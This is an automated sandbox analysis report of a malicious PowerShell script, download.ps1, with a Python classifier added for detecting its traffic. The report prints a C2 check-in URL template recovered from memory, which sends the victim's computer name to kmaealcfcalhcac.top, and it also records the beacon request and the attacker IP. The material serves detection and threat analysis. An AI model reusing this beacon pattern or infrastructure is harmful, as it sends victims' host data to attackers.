

Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1589104
MD5: 81b74a62ffc263437801f0e3dbc1b1eb
SHA1: f1649560edbc7742352cec091f4dc26922d9bdcb
SHA256: 9229403e77c223dc8acb86755f6576ff22ff15362da8b2577a85ed2083205e71

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 8624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4924, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8624, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4924, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8624, ProcessName: powershell.exe
Timestamp                        SID      Severity  Classtype                      Source IP      Source Port  Destination IP   Destination Port  Protocol
2025-01-11T09:45:39.301965+0100  2028371  3         Unknown Traffic                192.168.11.30  52799        23.45.46.170     443               TCP
2025-01-11T09:46:42.801954+0100  2028371  3         Unknown Traffic                192.168.11.30  52803        23.45.46.170     443               TCP
2025-01-11T09:45:40.368167+0100  2057741  1         A Network Trojan was detected  192.168.11.30  52800        45.61.136.138    80                TCP
2025-01-11T09:45:40.368167+0100  1810000  2         Potentially Bad Traffic        192.168.11.30  52800        45.61.136.138    80                TCP
2025-01-11T09:45:40.726140+0100  1810000  2         Potentially Bad Traffic        192.168.11.30  52801        142.250.191.196  80                TCP


AV Detection

Source: download.ps1 | Virustotal: Detection: 15%
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[B}X source: powershell.exe, 00000001.00000002.36324659770.00000257B48AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B47BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B44D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb{ source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb(h source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbS source: powershell.exe, 00000001.00000002.36326314777.00000257B4BFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming

Networking

Source: Network traffic | Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.30:52800 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: www.google.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 45.61.136.138
Source: Joe Sandbox View | ASN Name: AS40676US
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:52799 -> 23.45.46.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:52803 -> 23.45.46.170:443
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:52800 -> 45.61.136.138:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:52801 -> 142.250.191.196:80
Source: global traffic | HTTP traffic detected: GET /36aol1ybpfhtr.php?id=computer&key=67225157272&s=527 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: kmaealcfcalhcac.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 | Host: www.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanXz equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: kmaealcfcalhcac.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579E3C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=527
Source: powershell.exe, 00000001.00000002.36318893418.00000257B4501000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000001.00000002.36318893418.00000257B44D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.
Source: powershell.exe, 00000001.00000002.36318893418.00000257B4501000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kmaealcfcalhcac.top
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kmaealcfcalhcac.top/36aol1ybpfhtr.php?id=computer&key=67225157272&s=527
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D720000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D71B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPageXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D439000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.comXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24XI
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24Xz
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96Xz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.comXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?tab=w1
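The two HTTP requests and the URL template recovered from process memory above fit together: `$9bsu5ro72hgpqxk` resolved to kmaealcfcalhcac.top, `$x4dbnkmt7rp9vl2` to 36aol1ybpfhtr.php, and `$env:computername` to the sandbox hostname `computer`, which is what Suricata flagged as the TA582 check-in. The User-Agent is not a browser's: `Mozilla/5.0 (Windows NT; Windows NT 10.0; <locale>) WindowsPowerShell/5.1.<build>` is the default agent Invoke-WebRequest and Invoke-RestMethod send on Windows PowerShell 5.1, so the "known web browser user agent" signature is in practice a PowerShell fingerprint. The classifier below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses raw request text the way a proxy log or PCAP tool would hand it over, tags the PowerShell agent and the check-in URL shape, and separates the C2 beacon from the www.google.com connectivity probe. The inputs are the two requests from the report re-split onto header lines; the `.php?id=&key=&s=` shape is taken from the memory string, and nothing else is assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Default User-Agent that Invoke-WebRequest / Invoke-RestMethod send on
# Windows PowerShell 5.1; only the locale and the build number vary per host.
POWERSHELL_DEFAULT_UA = re.compile(
    r"^Mozilla/5\.0 \(Windows NT; Windows NT [\d.]+; [\w-]+\) WindowsPowerShell/5\.1\.\d+\.\d+$"
)

# The two requests recorded in the report, re-split onto header lines (the
# sandbox view ran them together). Constructed from the report text.
SANDBOX_REQUESTS = [
    "GET /36aol1ybpfhtr.php?id=computer&key=67225157272&s=527 HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151\r\n"
    "Host: kmaealcfcalhcac.top\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151\r\n"
    "Host: www.google.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Parse the request line and headers of one raw HTTP/1.x request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def classify(raw: str) -> dict:
    """Tag one request: PowerShell default UA, check-in URL shape, and the value it leaks."""
    req = parse_request(raw)
    url = urlsplit(req["target"])
    query = parse_qs(url.query)
    tags = []
    if POWERSHELL_DEFAULT_UA.match(req["headers"].get("user-agent", "")):
        tags.append("powershell-default-ua")
    # Shape of the template found in process memory:
    #   /<name>.php?id=$env:computername&key=<digits>&s=<digits>
    if (url.path.endswith(".php") and set(query) == {"id", "key", "s"}
            and query["key"][0].isdigit() and query["s"][0].isdigit()):
        tags.append("checkin-url-shape")
    return {
        "host": req["headers"].get("host", ""),
        "tags": tags,
        "leaked_hostname": query["id"][0] if "id" in query else None,
    }


def is_checkin(raw: str) -> bool:
    """True only when both the agent and the URL shape match; the UA alone
    also fires on the benign-looking www.google.com connectivity probe."""
    return {"powershell-default-ua", "checkin-url-shape"} <= set(classify(raw)["tags"])
```

Running `classify` over both requests tags each with `powershell-default-ua`, but only the kmaealcfcalhcac.top request also gets `checkin-url-shape`, so `is_checkin` isolates the beacon while still surfacing the host leaked in `id=`.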
Source: classification engine | Classification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
